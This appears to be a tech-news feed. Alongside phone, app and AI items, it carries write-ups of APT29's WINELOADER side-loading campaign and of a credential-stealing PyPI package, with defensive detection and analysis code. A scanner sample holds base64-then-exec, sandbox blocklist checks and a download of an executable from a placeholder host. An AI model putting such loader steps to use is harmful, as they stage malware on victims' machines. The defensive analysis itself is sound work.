Weaponized Zip Files That Deliver WINELOADER Malware


APT29, a Russian threat group, targeted German political parties with a new backdoor called WINELOADER using spear-phishing emails containing malicious links to ZIP files hosted on compromised websites.

The ZIP files deployed an HTA that initiated a multi-stage infection chain, delivering WINELOADER. 

The backdoor has functionalities for communication with command and control servers and utilizes evasion techniques.

To defend against the APT29 campaign, security teams should understand these TTPs and the WINELOADER backdoor to improve detection capabilities. 

APT29 uses spear-phishing emails with a malicious PDF attachment disguised as a wine-tasting invitation. The PDF tricks the victim into downloading a ZIP file containing an HTA (wine.hta or invite.hta). 

Attack Chain

The HTA uses obfuscated JavaScript (possibly obfuscated with obfuscator.io) to download and execute a legitimate but vulnerable Microsoft binary (sqlwriter.exe or sqldumper.exe) together with a malicious DLL (vcruntime140.dll). The legitimate binary side-loads the DLL, which establishes the initial foothold for the WINELOADER infection.


The Splunk Threat Research Team created an Atomic Red Team test that simulates the initial access stage of the WINELOADER campaign (excluding the data exfiltration tools): an HTA decodes a base64-encoded payload (invite.zip) containing a DLL (gup.exe).

The test mimics the side-loading behavior with a non-malicious DLL; to emulate the real attack more closely, it has sqlwriter.exe load a benign vcruntime140.dll.

Security teams can evaluate their capacity to identify these APT29 TTPs by running and analyzing this test, which will enable them to improve their analytics, response processes, and overall security posture.  

malicious .HTA

The HTA file exploits a DLL side-loading vulnerability. It first writes the Base64-encoded content of a malicious ZIP file (invite.zip) to a text file (invite.txt) on the system, then decodes the text file back to a ZIP and extracts its contents. 

It shows a user prompt, “Are You Ready?”, before executing the payload, likely a malicious DLL named gup.exe. If the user clicks “OK,” the DLL is loaded and likely spawns calc.exe as a test.

A final message box confirms successful DLL side-loading with the Atomic logo. 

Simulation Attack

WINELOADER exploits legitimate applications like SQLWriter.exe or Sqldumper.exe through DLL side-loading by loading a malicious vcruntime140.dll that triggers code execution. 
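As an added illustration of how a defender would look for the side-loading pattern described above (the HTA dropping sqlwriter.exe or sqldumper.exe together with vcruntime140.dll, in both the real campaign and the Atomic Red Team test), the following Python script is example code written for this page; it is not Splunk's test, the Atomic Red Team code, or any vendor's detection. It runs a simple rule over constructed, Sysmon-style events (the dict keys, user names and file paths are assumptions, not real telemetry): the campaign's host binaries are flagged when they load vcruntime140.dll from outside the expected install directories, and when they are launched by mshta.exe or from a user-writable path.

```python
import ntpath

# Binaries the campaign abuses as side-loading hosts and the DLL they pull in
# (both names taken from the write-up above).
SIDELOAD_HOSTS = {"sqlwriter.exe", "sqldumper.exe"}
SIDELOADED_DLL = "vcruntime140.dll"
# Directories where a legitimately installed copy of the DLL would live
# (assumed list; extend it for your estate).
TRUSTED_DIR_PREFIXES = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",
    r"c:\program files (x86)",
)
# Path fragments that mark user-writable locations where an HTA can drop files.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def is_trusted_dir(path):
    """True when `path` sits under one of the expected install directories."""
    return ntpath.dirname(path).lower().startswith(TRUSTED_DIR_PREFIXES)


def is_user_writable(path):
    """True when `path` contains a fragment typical of user-writable folders."""
    low = path.lower()
    return any(hint in low for hint in USER_WRITABLE_HINTS)


def flag_sideload(events):
    """Return (rule, process, path) alerts for events matching the WINELOADER pattern.

    Each event is a dict in a simplified, Sysmon-like shape (constructed for this
    example, not the real Sysmon schema): event_id 1 = process creation,
    event_id 7 = image load.
    """
    alerts = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        if ev["event_id"] == 7:
            loaded = ev["image_loaded"]
            if (image in SIDELOAD_HOSTS
                    and ntpath.basename(loaded).lower() == SIDELOADED_DLL
                    and not is_trusted_dir(loaded)):
                alerts.append(("dll-sideload", image, loaded))
        elif ev["event_id"] == 1:
            parent = ntpath.basename(ev.get("parent_image", "")).lower()
            if image in SIDELOAD_HOSTS and (parent == "mshta.exe" or is_user_writable(ev["image"])):
                alerts.append(("sql-binary-from-hta-or-userdir", image, ev["image"]))
    return alerts


# Constructed sample events: an HTA launches a dropped sqlwriter.exe, which loads
# vcruntime140.dll from the same temp folder; a properly installed sqlwriter.exe
# loading the system copy is the benign control.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"event_id": 1, "image": r"C:\Users\alice\AppData\Local\Temp\invite\sqlwriter.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    {"event_id": 7, "image": r"C:\Users\alice\AppData\Local\Temp\invite\sqlwriter.exe",
     "image_loaded": r"C:\Users\alice\AppData\Local\Temp\invite\vcruntime140.dll"},
    {"event_id": 7, "image": r"C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe",
     "image_loaded": r"C:\Windows\System32\vcruntime140.dll"},
]

if __name__ == "__main__":
    for alert in flag_sideload(SAMPLE_EVENTS):
        print(alert)
```

On real telemetry, map `image`, `image_loaded` and `parent_image` to the Sysmon `Image`, `ImageLoaded` and `ParentImage` fields, and keep the rule scoped to the known host binaries so it stays low-noise; a broader rule on any vcruntime140.dll loaded from a user-writable path will catch more but needs tuning.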

The code decrypts a hidden data block using the RC4 algorithm with a key stored within the malicious DLL itself, allowing WINELOADER to gain initial functionality on a compromised system. 

One of the RC4 keys

Researchers analyzed a malicious DLL file (vcruntime140.dll) containing a WINELOADER variant that is encrypted with the RC4 algorithm and hides critical components, such as API names and strings, to avoid detection.
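The two paragraphs above describe the mechanism an analyst works against: a data block inside the DLL, RC4-encrypted with a key that is itself stored in the DLL, hiding API names and strings. The Python below is an added example for this page, not code from the report or from the malware: it implements RC4 (KSA and PRGA) and a small `strings`-style extractor, then shows what recovering the hidden block looks like once the key is known. The key and the data block are constructed stand-ins, not the real WINELOADER values.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (KSA) followed by keystream generation (PRGA)
    XORed over `data`. Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                           # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def printable_strings(blob: bytes, min_len: int = 4) -> list:
    """Extract runs of printable ASCII, the way a `strings` pass would."""
    found, run = [], bytearray()
    for b in blob + b"\x00":                    # sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(run.decode("ascii"))
            run = bytearray()
    return found


def recover_strings(key: bytes, blob: bytes) -> list:
    """Decrypt an RC4-protected block with the embedded key and list its strings."""
    return printable_strings(rc4(key, blob))


# Constructed stand-ins (NOT the real WINELOADER key or data block): a key as it
# might be stored in the DLL, and a block holding API names and a C2 URL
# encrypted under that key. The URL is a placeholder, not a real indicator.
SAMPLE_KEY = b"placeholder-rc4-key"
SAMPLE_PLAINTEXT = b"\x00LoadLibraryA\x00GetProcAddress\x00https://c2.example.invalid/\x00"
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("encrypted block:", SAMPLE_BLOB.hex())
    for s in recover_strings(SAMPLE_KEY, SAMPLE_BLOB):
        print("recovered:", s)
```

Because RC4 is symmetric, the same routine that decrypts the block would produce it; an analyst with the key extracted from the DLL can therefore dump the hidden strings without running the sample, which is also how the C2 addresses and user-agent strings mentioned below are typically recovered.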

C2, User Agent & Landing Page

After decryption, the malware connects to its command and control server (C2) and downloads additional malicious components.

The report provides the C2 server addresses and user-agent strings used by the malware. 




Galaxy Tab S7, A32, A23 & more grab Samsung’s April update


Samsung continues to expand its April 2024 security update to more Galaxy devices. It recently released the new security patch for the Galaxy Tab S7 series, Galaxy A32, Galaxy A23, Galaxy A12 Nacho, and Galaxy M54. The company has already updated all eligible flagship models globally.

April update rolling out to the Galaxy Tab S7 series

Launched in August 2020, the Galaxy Tab S7 series is in its final year of official software support. The aging flagship tablets have already stopped getting feature updates (didn’t get Android 14 or One UI 6.0) but security patches are still coming once in a while. Samsung is now rolling out the latest SMR (Security Maintenance Release) to the devices.

The April update for the Galaxy Tab S7 and Galaxy Tab S7+ is rolling out in Europe and Latin America, SamMobile reports. The firmware build number for the tablets ends with DXD1. Samsung should soon expand the rollout to other markets. The update brings over 40 security fixes that are part of the latest SMR. There aren’t any other changes.

The same security fixes are also rolling out to the Galaxy A32 (4G). The update is currently available in the Caribbean region with the build number A325MUBS7DXD1. This phone is also no longer eligible for feature updates (received Android 12 and Android 13), so the update is all about the latest SMR. Its 5G version has yet to pick up the April patch.

As far as the Galaxy A23 is concerned, both 4G and 5G versions are picking up the April SMR. The rollout for the former has begun in Samsung’s homeland South Korea. Users are getting the update with the firmware version A235NKSS4DXD1. For the 5G model, the update is available in Europe with the build number A236BXXU5DXD6.

The Galaxy A23 is eligible for the One UI 6.1 update. However, the latest release doesn’t seem to bring it, though the build version suggests the update isn’t all about the April security patch. Maybe there are some additional bug fixes in tow. The device should receive One UI 6.1 in a month or two. Don’t expect to get the new AI features from the Galaxy S24 series, though.

Galaxy A12 Nacho and M54 are also getting these security fixes

Samsung is also updating the Galaxy A12 Nacho and Galaxy M54 to the April security patch. The former is picking up the new SMR in Asia with firmware version A127FXXSBDXD2. The latter is getting it in Latin America with the build number M546BXXS4BXD1. The Galaxy M54 may receive One UI 6.1 but the Galaxy A12 Nacho is done getting feature updates.



Microsoft’s VASA-1 can create lifelike talking faces


At this point, it’s safe to say that AI technology is advancing at a rapid pace. Microsoft is one of the leading companies in AI with the help of OpenAI. Microsoft’s latest tool is called VASA-1, a powerful tool that generates lifelike talking faces in real time.

This is evidence of AI’s growing ability to mimic human beings based on minimal input. For example, TikTok is working on a tool that will let people make an AI-generated clone of their voice with only 10 seconds of audio input. At the time of writing this article, this tool is not available to the public. However, we expect it to be coming out relatively soon.

Microsoft’s VASA-1 allows users to create lifelike talking faces in real time

We’ve seen examples of this through hundreds of advertisements of apps that let you animate a portrait to make it seem like you’re singing a Billie Eilish song. However, the technology behind VASA-1 is much more advanced and much more refined. You’re able to use a singular picture for this tool. Using this picture, the tool will be able to generate realistic movement to make it appear that the person is speaking.

This is impressive as is, but it goes further than that. VASA-1 can actually create subtle facial movements and convey a wide range of emotions. This is something that has been lacking with similar tools over the years. Its main focus is realism, and it gets really close to that.

The company showed off a few examples of this technology on its website, and it’s very impressive. Aside from that, talking faces can lip-sync to audio in real-time. That’s another great quality of this tool.

Microsoft VASA-1 can generate 512×512 videos at up to 40FPS. Also, on its online streaming mode, Microsoft boasts a latency of only 170ms.

At this point, we don’t know when Microsoft plans on releasing this feature to the masses. However, when it does, we’re pretty sure that Microsoft will monetize it. It could possibly be a feature in one of the company’s subscription services. We will have to wait for it to come out in order to be sure.



Pixel phone giveaway in #STEMTok competition amid TikTok US ban threat


TikTok might face a ban in the US after the latest House vote, but let’s put politics aside.

Right now, TikTok offers users a chance to win a Google Pixel phone (not specified which exact model, but, hey, it certainly won’t be the Pixel 3a from 2019) by participating in the first STEM competition on TikTok.

STEM stands for science, technology, engineering, and math.

To participate in the challenge, students aged 13-21, and teachers of all kinds, are encouraged to submit their best STEM communication video on TikTok’s STEM feed using the hashtag #STEMTok.

The competition kicks off on Earth Day, April 22, and will finish on May 31.

Here’s your participation guide:

  • Make a STEM-related video using the hashtag #StemTok explaining any STEM topic of your choice.
  • Introduce yourself! Share your expertise or interest in STEM (e.g., “I’m a student,” “I’m a teacher,” “I’m a chemist,” “I’m passionate about nature,” etc.).
  • Dive into the explanation of your chosen STEM topic with clarity and enthusiasm.
  • Conclude your video with a bang!
  • Upload your video to TikTok, ensuring you use the hashtag #STEMTok.
  • Make sure to post your video between April 22 and May 31 to qualify for the competition.
  • The EXPLR account will judge the videos and grant a Google Pixel to winners each week during the competition!

TikTok’s team says that in the US, 33% of TikTok’s community already actively engages with STEM content through the dedicated feed. After over 50,000 users signed up to watch the exclusive stream of the National STEM Festival, TikTok LIVE will stream STEM-related content for seven weeks during the contest, amplifying the contest and expanding the audience engaging with STEM content on the platform. Nearly 15 million STEM-related videos have been published globally on TikTok since 2021.

Here’s what an EXPLR representative has to say about the competition:



Malicious PyPI Package Attacking Discord Users


Hackers often target PyPI packages to exploit vulnerabilities and inject malicious code into widely used Python libraries.

Recently, cybersecurity researchers at FortiGuard Labs identified a malicious PyPI package attacking Discord users to steal credentials.

The malicious PyPI package that was discovered is described as “discordpy_bypass-1.7,” published on March 10th, 2024, and detected on March 12, 2024.

discordpy_bypass-1.7 (Source – Fortinet)

The package, authored by Theaos and published in seven versions with nearly identical characteristics, is intended to obtain sensitive information from victims via persistence techniques, browser data extraction, and token harvesting.

Technical Analysis

The discordpy_bypass-1.7 PyPI package is built to take sensitive data from user systems, and it relies on code obfuscation and evasion checks aimed at analysis environments to stay hidden.


The code performs several checks to detect a debugging or analysis environment and exits if one is found, an attempt to avoid detection.

The code involves three levels of obfuscation:

  • base64 encoding the original Python code
  • Encoding with obfuscation techniques
  • Compilation into an executable fetched from a remote URL by discordpy_bypass/discordpy_bypass.py

The code also contains debugging-environment detection techniques: it checks for blocklisted processes and compares the system’s IP and MAC addresses against blocklists.

Block listed IPs and MACs (Source – Fortinet)

This makes it critical for people to be alert right from the beginning and take initiative regarding such threats.

FortiGuard said that, to detect debugging environments, the code also checks the system username, hostname, and hardware ID against blocklists.
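The obfuscation layers and the host-fingerprinting checks described above are the kind of thing a package reviewer can flag statically, before anything is installed. The Python below is an added example written for this page, not FortiGuard's tooling or the discordpy_bypass code: it parses a module with the standard `ast` library and reports three patterns, base64-decode-then-`exec`, a download whose URL or target ends in an executable extension, and username/hostname/MAC lookups compared against a list. The `SAMPLE_SOURCE` it scans is a constructed loader written to trigger those rules (its base64 blob decodes to a harmless `print`, and `example.invalid` is a placeholder domain); it is not the malicious package.

```python
import ast

# Call names a loader uses to hide and stage its real code and to fingerprint
# the host before running (these sets are assumptions; extend as needed).
EXEC_CALLS = {("exec",), ("eval",), ("builtins", "exec"), ("builtins", "eval")}
DECODE_CALLS = {("base64", "b64decode"), ("base64", "b32decode"), ("base64", "a85decode")}
FETCH_CALLS = {("urllib", "request", "urlretrieve"), ("urllib", "request", "urlopen"),
               ("requests", "get")}
ANTI_ANALYSIS_CALLS = {
    ("getpass", "getuser"): "username check",
    ("socket", "gethostname"): "hostname check",
    ("platform", "node"): "hostname check",
    ("uuid", "getnode"): "MAC address check",
}


def dotted_name(node):
    """('base64', 'b64decode') for base64.b64decode, ('exec',) for exec, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return tuple(reversed(parts))
    return None


def calls_in(node, wanted):
    """All Call nodes inside `node` (itself included) whose dotted name is in `wanted`."""
    return [sub for sub in ast.walk(node)
            if isinstance(sub, ast.Call) and dotted_name(sub.func) in wanted]


def scan_source(source):
    """Return sorted (line, kind, detail) findings for one Python source file."""
    tree = ast.parse(source)
    findings = []
    # Pass 1: names assigned directly from a decode call, e.g. payload = base64.b64decode(...)
    tainted = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and calls_in(node.value, DECODE_CALLS):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # Pass 2: exec/eval of decoded data, fetches of executables, blocklist comparisons.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in EXEC_CALLS:
                decoded = calls_in(node, DECODE_CALLS) or any(
                    isinstance(a, ast.Name) and a.id in tainted for a in node.args)
                if decoded:
                    findings.append((node.lineno, "decode-then-exec", name[-1]))
            elif name in FETCH_CALLS:
                strings = [c.value for c in ast.walk(node)
                           if isinstance(c, ast.Constant) and isinstance(c.value, str)]
                if any(s.lower().endswith((".exe", ".dll")) for s in strings):
                    findings.append((node.lineno, "remote-executable-fetch", ".".join(name)))
        elif isinstance(node, ast.Compare) and any(isinstance(op, (ast.In, ast.NotIn)) for op in node.ops):
            for call in calls_in(node, ANTI_ANALYSIS_CALLS):
                findings.append((node.lineno, "blocklist-check",
                                 ANTI_ANALYSIS_CALLS[dotted_name(call.func)]))
    return sorted(findings)


# Constructed sample (not the real package): blocklist checks on username, hostname
# and MAC, a base64 blob handed to exec, and a fetch of a remote .exe.
SAMPLE_SOURCE = '''\
import base64, os, socket, getpass, uuid, urllib.request
BLOCKED_USERS = ["sandbox", "malware", "analyst"]
BLOCKED_HOSTS = ["DESKTOP-SANDBOX"]
BLOCKED_MACS = ["0x00155d000000"]
if getpass.getuser() in BLOCKED_USERS or socket.gethostname() in BLOCKED_HOSTS:
    raise SystemExit(0)
if hex(uuid.getnode()) in BLOCKED_MACS:
    raise SystemExit(0)
payload = base64.b64decode("cHJpbnQoJ2hpJyk=")
exec(payload)
urllib.request.urlretrieve("http://example.invalid/stage2.exe",
                           os.path.join(os.getenv("TEMP", "."), "stage2.exe"))
'''

if __name__ == "__main__":
    for line, kind, detail in scan_source(SAMPLE_SOURCE):
        print(f"line {line}: {kind} ({detail})")
```

The scanner only follows one level of assignment, so a loader that passes the decoded bytes through a helper before `exec` would slip past the first rule; the blocklist rule is the more robust of the three because the fingerprint calls have to appear in a comparison somewhere. Run it over every `.py` in an unpacked wheel or sdist before installing.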

It initializes variables and sets up Socket.IO events for remote control and monitoring, enabling actions such as file operations, directory navigation, and command execution.

Authentication tokens, especially Discord tokens, are the main target, alongside sensitive browser data such as login credentials, cookies, and web history.

Before uploading them to a remote server, it also decrypts and validates any extracted tokens.

The discordpy_bypass-1.7 code is a smart and stealthy cyber threat that aims to steal crucial system data quietly by using evasive measures to avoid detection and analysis.

This disguise as a legitimate package illustrates the nature of such online threats and the need for vigilance and strong protections.

With knowledge of such threats, researchers can design more secure systems to enhance personal information and general safety for users through joint vigilance and cooperation.




Galaxy S24 FE launch may be delayed to late 2024 or early 2025


Samsung’s next Fan Edition (FE) smartphone, the Galaxy S24 FE, may be slightly delayed. Current developments suggest the device will arrive late in 2024 or early 2025. The company launched the Galaxy S23 FE in October last year.

Galaxy S24 FE may arrive later than expected

Samsung has yet to give its FE lineup a fixed launch schedule like the Galaxy S flagships and Galaxy Z foldables. New S series models arrive early in the year, while foldables are refreshed in July or August. We cannot say the same for the FE lineup. The Galaxy S20 FE, the first model in this series, debuted in September 2020. Samsung followed up with the Galaxy S21 FE in January 2022.

We never got a Galaxy S22 FE, while the Galaxy S23 FE arrived in October 2023. Ideally, the Galaxy S24 FE should debut in September or October this year. However, there is little chance of that happening. The rumor mill has yet to churn out a lot of information about the phone, suggesting that it is in a very early stage of development. As such, the launch may be delayed to late 2024.

According to GalaxyClub, Samsung could even push the Galaxy S24 FE to an early 2025 release. The publication says the company is developing the device under the codename R12, which is in line with previous models in the lineup—the Galaxy S23 FE was R11, Galaxy S21 FE was R9, and Galaxy S20 FE was R8 (which means the canceled Galaxy S22 FE was R10).

This is all we know about the Galaxy S24 FE today. Rumors have hinted at beefy specs (more on that later) but not many credible sources have backed those. What we can say for sure is that Samsung has a new FE phone in the pipeline. Unless the company changes its mind in the coming months, the device will see the light of day later this year or early 2025. We will keep you posted.

Rumored specs hint at a solid phone

An X tipster recently shared the alleged key specs of the Galaxy S24 FE. While we can’t vouch for the authenticity of the specs, they certainly hint at a solid phone. The device will reportedly feature the Snapdragon 8 Gen 3 or Exynos 2400, the same chipset that powers the Galaxy S24 flagships. Samsung plans to offer up to 256GB of UFS 4.0 storage, up to 12GB of LPDDR5X RAM, and a 4500mAh battery, likely with 25W charging. More details are awaited.



Chrome for Android’s Quick Delete feature is heading to iOS


Android users looking to quickly delete their browsing history on Chrome can tap the three-dot menu in the upper right corner of the display and tap on Clear browsing data. This allows the user to clear their browsing history from the last 15 minutes or longer. Tapping on the small arrow next to where the Clear browsing data box says “Last 15 minutes” opens a small menu allowing you to change the time frame to clear your browsing data from 15 minutes to the last hour, last 24 hours, last 7 days, last 4 weeks, and all time.

Tapping the blue “Clear data” pill on the bottom right of the screen will remove from the app the sites you’ve visited over the time period that you’ve selected. If you don’t want to leave your most recent browsing history in the open where it can be easily viewed by someone taking physical possession of your phone, Android users might want to make it a regular habit to clear their Chrome browsing data using the 15-minute option.

Currently, the option to erase the last 15 minutes of browsing history has been limited to the Android version of the Chrome app. Those using the iOS version of Chrome can’t delete anything less than the last hour of data but this is going to change according to The Mac Observer. The latter says that a Chrome flag titled “Quick Delete for iOS” is being added although it currently is not listed. The description of the flag will read, “Enables a new way for users to more easily delete their browsing history in iOS.”

To clear your browsing history on the iOS version of Chrome, open the app and tap the three-button menu on the bottom right of the screen. Tap on Clear Browsing Data. To select the time period you want cleared, tap the Time Range button near the top of the screen and choose from Last Hour, 24 Hours, Last 7 days, Last 4 weeks, and All Time. Once you’ve selected a time range, hit the back button on the upper left corner, and from the Clear Browsing Data screen, make sure the time range has the time you selected and at the bottom of the page, tap on the red “Clear Browsing Data” link.

Interestingly, iOS users can already remove the last 15 minutes of Search history from the iOS Google app, so adding a 15-minute option to clear browsing data in the iOS version of Chrome seems like a sure thing.



Hacker Group Claims To Have Broken Into IDF


Anonymous claims a successful cyberattack against the Israeli Defence Force (IDF), gaining access to 20 gigabytes of data, which allegedly includes over 233,000 military documents in various formats, like PDFs, Word files, and presentations. 

The IDF considers the authenticity of the claim dubious and suspects a psychological warfare tactic.

They reason that their layered, secure computer systems were likely not breached directly, and if a breach did occur, they suspect it compromised civilian systems instead. 

Hackers released a video containing purportedly genuine excerpts from IDF presentations, but the IDF dismisses this as a possible psychological warfare tactic, casting doubt on the authenticity of the material. 

The IDF emphasizes the robustness of its computer systems, which are secured with multiple layers of protection, making it highly unlikely that the hackers breached the IDF’s core network directly. 

If any IDF information was compromised, it was more likely due to unauthorized access to civilian systems, potentially in violation of IDF regulations.

Earlier this month, a group affiliated with the loose-knit hacktivist collective Anonymous allegedly launched a cyberattack against the Justice Ministry’s IT infrastructure. The attackers claim to have breached the ministry’s defences and exfiltrated a dataset exceeding 300 gigabytes in size. 

This data dump reportedly contains 8 million files, potentially including sensitive personal information.

The group’s motivations remain unclear, but some members have expressed anti-Israeli sentiment, possibly linking the attack to a broader geopolitical agenda.


According to Jerusalem, the national cyber authority issued a warning about a surge in cyberattacks following Ramadan, and the attacks are expected to target Israel and its online infrastructure. 

Potential threats include website breaches, infiltration of digital systems (including smart homes), and leaks of sensitive data.

Hackers might also deploy tracking software and attempt unauthorized access to systems, potentially for purposes of espionage or disruption.




Post News, a Twitter alternative is shutting down


In the fast-paced world of social media apps, the rise and fall of new contenders are all too common. One such platform, Post News, emerged as a potential rival to Twitter with its unique features and innovative approach to content consumption. However, despite the initial buzz and backing from venture capital firm Andreessen Horowitz, Post News has now announced its impending closure.

The rise and fall of Post News

Post News made waves in the social media scene when it launched in a closed beta phase in November 2022. The platform offered users ad-free access to premium content from top publishers for a small fee per article, setting it apart from traditional social networks. With the support of Andreessen Horowitz, excitement surrounding Post News reached a peak as it garnered over 430,000 users following the waitlist’s removal in early 2023.


Challenges and setbacks

Despite early signs of success, Post News struggled to achieve the necessary growth to sustain itself as a viable business. Noam Bardin, the platform’s visionary and former Waze CEO, acknowledged the difficulties in a statement, citing the failure to capture widespread consumer adoption as a key factor in the decision to shut down. The platform’s commendable efforts to foster a positive community and meaningful engagement were not enough to overcome the challenges it faced.

Lessons learned and moving forward

As Post News prepares to close its doors on May 31st, users are encouraged to download their posts and settle any remaining balances on the platform. The closure serves as a reminder of the fierce competition and ever-changing landscape of the tech industry, where even well-funded ventures can struggle to stay profitable. However, as Post News bows out, other social media platforms like Mastodon, Bluesky, and Meta’s Threads continue to evolve and offer users new experiences.

While Post News may be a cautionary tale, the tech industry’s spirit of innovation and resilience lives on. As platforms come and go, the quest for the next transformative social experience persists, driven by the creativity and determination of creators and users alike. Although Post News may be shutting down, the ever-changing world of social media will continue to evolve, offering new opportunities and challenges for those willing to venture into its realm.



Tinder wants your mom to know when and where you go on dates

According to Tinder, around 51 percent of users under 30 share date details with their friends, while 19 percent of users do so with their mom. The company wants to streamline the process with a new feature that will allow users to quickly and easily share details about their upcoming date through a single link.

The new feature is called Share My Date, and it generates a link pointing to details about your planned date. These include the date, time, and location of the event, along with a picture of the person you’re meeting and a link to their profile. You can also add personal notes, such as “this could be the one” or “call the police if I’m not back by 8 p.m.”

All (mom) jokes aside, this obviously aims to give Tinder users an extra layer of safety. It’s good to let somebody know that you’re going to meet a stranger. For the players out there, there’s no limit on the number of shareable URLs you can create with the new feature, and you can set these in the app up to 30 days in advance.

This isn’t the first feature of this kind on a dating app or service. Back in 2020, the site Match.com introduced a similar “check-in” feature that let users send details about their date to designated emergency contacts if things were going south.

But it’s not dating apps alone that care about your whereabouts. Back in 2022, Google introduced a location sharing feature in Maps, notifying you when a friend or family member has shown up or left a place.

The new Share My Date feature will be rolled out over the coming months. It’ll be available in the US, UK, Australia, Canada, Singapore, India, Ireland, Germany, France, Spain, Japan, Brazil, Switzerland, Mexico, the Netherlands, Italy, Korea, Vietnam, and Thailand. What do you think about it? Would you use it just to be extra safe? And since we’re talking about it, can you share the weirdest Tinder date experience you’ve had?

